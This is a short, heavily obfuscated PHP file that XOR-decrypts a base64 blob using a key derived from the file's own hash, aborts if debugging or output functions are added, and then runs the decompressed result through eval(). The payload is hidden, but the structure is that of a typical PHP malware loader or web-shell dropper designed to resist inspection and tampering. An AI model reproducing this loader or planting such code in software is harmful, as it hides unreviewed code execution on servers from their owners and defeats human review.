<?php
$fikiqxfd="5f67c96c80aad8650954d0d267d68ac9";
$basokupx="04025051510e0e515c0505565301000c5409510d52055257010350025e545608";
$zwirzsd="gtM11vsHioHVgjG/uO5mFioeLnT7HuAuG3sYfk/j/nx8LapPZOBsgtOGtTAdaoaIS/hMaf55ZbVnePkZTpzhYbDM6qka/vXjsIFmHWM5r7xIPHU63377THmxHB2mUFZvT1jswzdHhUtNrA3hNw==";
$xwoqcgobkcr=file_get_contents(__FILE__);
$jnyuiuizw=str_replace($zwirzsd,"",$xwoqcgobkcr);
if(strpos($jnyuiuizw,"ec"."ho")!==false||strpos($jnyuiuizw,"pr"."int")!==false||strpos($jnyuiuizw,"var_"."dump")!==false||strpos($jnyuiuizw,"file_put_"."contents")!==false||strpos($jnyuiuizw,"fw"."rite")!==false){die();}
$jypfdwxo=str_replace(array($fikiqxfd,$basokupx),array("SP_35a69610","KP_e2443f61"),$xwoqcgobkcr);
$agaswxlx=md5($jypfdwxo);
$cgxmrk=hex2bin($basokupx);
$daznusfopis="";
$ippcuex=strlen($agaswxlx);
for($vcldhym=0;$vcldhym<$ippcuex;$vcldhym++){
    $daznusfopis.=chr(ord($cgxmrk[$vcldhym])^ord($agaswxlx[$vcldhym]));
}
$kbdgeoox=base64_decode($zwirzsd);
$wqpsmem=strlen($kbdgeoox);
$glnwdphlzv="";
$ymhykqwdcogj=strlen($daznusfopis);
for($vcldhym=0;$vcldhym<$wqpsmem;$vcldhym++){
    $glnwdphlzv.=$kbdgeoox[$vcldhym]^$daznusfopis[$vcldhym%$ymhykqwdcogj];
}
$fxmwvghh="gz"."in"."fl"."ate";
eval($fxmwvghh($glnwdphlzv));
